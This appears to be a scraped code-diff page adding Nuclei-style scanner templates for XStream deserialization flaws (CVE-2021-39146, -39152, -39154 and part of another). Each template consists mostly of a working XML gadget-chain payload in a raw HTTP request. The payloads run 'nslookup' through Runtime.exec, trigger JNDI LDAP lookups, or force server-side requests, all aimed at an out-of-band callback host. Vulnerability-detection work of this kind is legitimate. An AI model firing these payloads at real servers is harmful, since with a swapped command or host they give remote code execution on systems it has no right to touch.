||||
<parameter-types>
|
||||
<class>java.lang.Object</class>
|
||||
</parameter-types>
|
||||
</method>
|
||||
<sun.tracing.dtrace.DTraceProbe>
|
||||
<proxy class='java.lang.Runtime'/>
|
||||
<implementing__method>
|
||||
<class>java.lang.Runtime</class>
|
||||
<name>exec</name>
|
||||
<parameter-types>
|
||||
<class>java.lang.String</class>
|
||||
</parameter-types>
|
||||
</implementing__method>
|
||||
</sun.tracing.dtrace.DTraceProbe>
|
||||
</entry>
|
||||
</probes>
|
||||
</handler>
|
||||
</dynamic-proxy>
|
||||
<string>nslookup {{interactsh-url}}</string>
|
||||
</java.util.PriorityQueue>
|
||||
</java.util.PriorityQueue>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,84 @@
|
|||
id: CVE-2021-39146
|
||||
|
||||
info:
|
||||
name: CVE-2021-39146
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in execution of arbitrary code loaded from a remote server.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-39146.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>test</type>
|
||||
<value class='javax.swing.MultiUIDefaults' serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<hashtable>
|
||||
<default>
|
||||
<loadFactor>0.75</loadFactor>
|
||||
<threshold>525</threshold>
|
||||
</default>
|
||||
<int>700</int>
|
||||
<int>0</int>
|
||||
</hashtable>
|
||||
<javax.swing.UIDefaults>
|
||||
<default>
|
||||
<defaultLocale>zh_CN</defaultLocale>
|
||||
<resourceCache/>
|
||||
</default>
|
||||
</javax.swing.UIDefaults>
|
||||
<javax.swing.MultiUIDefaults>
|
||||
<default>
|
||||
<tables>
|
||||
<javax.swing.UIDefaults serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<hashtable>
|
||||
<default>
|
||||
<loadFactor>0.75</loadFactor>
|
||||
<threshold>525</threshold>
|
||||
</default>
|
||||
<int>700</int>
|
||||
<int>1</int>
|
||||
<string>lazyValue</string>
|
||||
<javax.swing.UIDefaults_-ProxyLazyValue>
|
||||
<className>javax.naming.InitialContext</className>
|
||||
<methodName>doLookup</methodName>
|
||||
<args>
|
||||
<string>ldap://{{interactsh-url}}/#evil</string>
|
||||
</args>
|
||||
</javax.swing.UIDefaults_-ProxyLazyValue>
|
||||
</hashtable>
|
||||
<javax.swing.UIDefaults>
|
||||
<default>
|
||||
<defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
|
||||
<resourceCache/>
|
||||
</default>
|
||||
</javax.swing.UIDefaults>
|
||||
</javax.swing.UIDefaults>
|
||||
</tables>
|
||||
</default>
|
||||
</javax.swing.MultiUIDefaults>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>test</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
||||
<m__obj class='string'>test</m__obj>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
</sorted-set>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
|
|
@ -0,0 +1,49 @@
|
|||
id: CVE-2021-39152
|
||||
|
||||
info:
|
||||
name: CVE-2021-39152
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in a server-side forgery request.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-39152.html
|
||||
tags: cve,cve-2021,xstream,ssrf
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<map>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.runtime.Source_-URLData>
|
||||
<url>http://{{interactsh-url}}/internal/</url>
|
||||
<cs>GBK</cs>
|
||||
<hash>1111</hash>
|
||||
<array>b</array>
|
||||
<length>0</length>
|
||||
<lastModified>0</lastModified>
|
||||
</jdk.nashorn.internal.runtime.Source_-URLData>
|
||||
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
|
||||
</entry>
|
||||
<entry>
|
||||
<jdk.nashorn.internal.runtime.Source_-URLData>
|
||||
<url>http://{{interactsh-url}}/internal/</url>
|
||||
<cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
|
||||
<hash>1111</hash>
|
||||
<array>b</array>
|
||||
<length>0</length>
|
||||
<lastModified>0</lastModified>
|
||||
</jdk.nashorn.internal.runtime.Source_-URLData>
|
||||
<jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
|
||||
</entry>
|
||||
</map>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "http"
|
||||
|
|
@ -0,0 +1,84 @@
|
|||
id: CVE-2021-39154
|
||||
|
||||
info:
|
||||
name: CVE-2021-39154
|
||||
author: pwnhxl
|
||||
severity: high
|
||||
description: All versions until and including version 1.4.17 are affected, if using the version out of the box. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
|
||||
reference:
|
||||
- https://x-stream.github.io/CVE-2021-39154.html
|
||||
tags: cve,cve-2021,xstream,deserialization,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST / HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/xml
|
||||
|
||||
<sorted-set>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>ysomap</type>
|
||||
<value class='javax.swing.MultiUIDefaults' serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<hashtable>
|
||||
<default>
|
||||
<loadFactor>0.75</loadFactor>
|
||||
<threshold>525</threshold>
|
||||
</default>
|
||||
<int>700</int>
|
||||
<int>0</int>
|
||||
</hashtable>
|
||||
<javax.swing.UIDefaults>
|
||||
<default>
|
||||
<defaultLocale>zh_CN</defaultLocale>
|
||||
<resourceCache/>
|
||||
</default>
|
||||
</javax.swing.UIDefaults>
|
||||
<javax.swing.MultiUIDefaults>
|
||||
<default>
|
||||
<tables>
|
||||
<javax.swing.UIDefaults serialization='custom'>
|
||||
<unserializable-parents/>
|
||||
<hashtable>
|
||||
<default>
|
||||
<loadFactor>0.75</loadFactor>
|
||||
<threshold>525</threshold>
|
||||
</default>
|
||||
<int>700</int>
|
||||
<int>1</int>
|
||||
<string>ggg</string>
|
||||
<javax.swing.UIDefaults_-ProxyLazyValue>
|
||||
<className>javax.naming.InitialContext</className>
|
||||
<methodName>doLookup</methodName>
|
||||
<args>
|
||||
<arg>ldap://{{interactsh-url}}/CallRemoteMethod</arg>
|
||||
</args>
|
||||
</javax.swing.UIDefaults_-ProxyLazyValue>
|
||||
</hashtable>
|
||||
<javax.swing.UIDefaults>
|
||||
<default>
|
||||
<defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
|
||||
<resourceCache/>
|
||||
</default>
|
||||
</javax.swing.UIDefaults>
|
||||
</javax.swing.UIDefaults>
|
||||
</tables>
|
||||
</default>
|
||||
</javax.swing.MultiUIDefaults>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<javax.naming.ldap.Rdn_-RdnEntry>
|
||||
<type>ysomap</type>
|
||||
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
|
||||
<m__obj class='string'>test</m__obj>
|
||||
</value>
|
||||
</javax.naming.ldap.Rdn_-RdnEntry>
|
||||
</sorted-set>
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
words:
|
||||
- "dns"
|
||||
Loading…
Reference in New Issue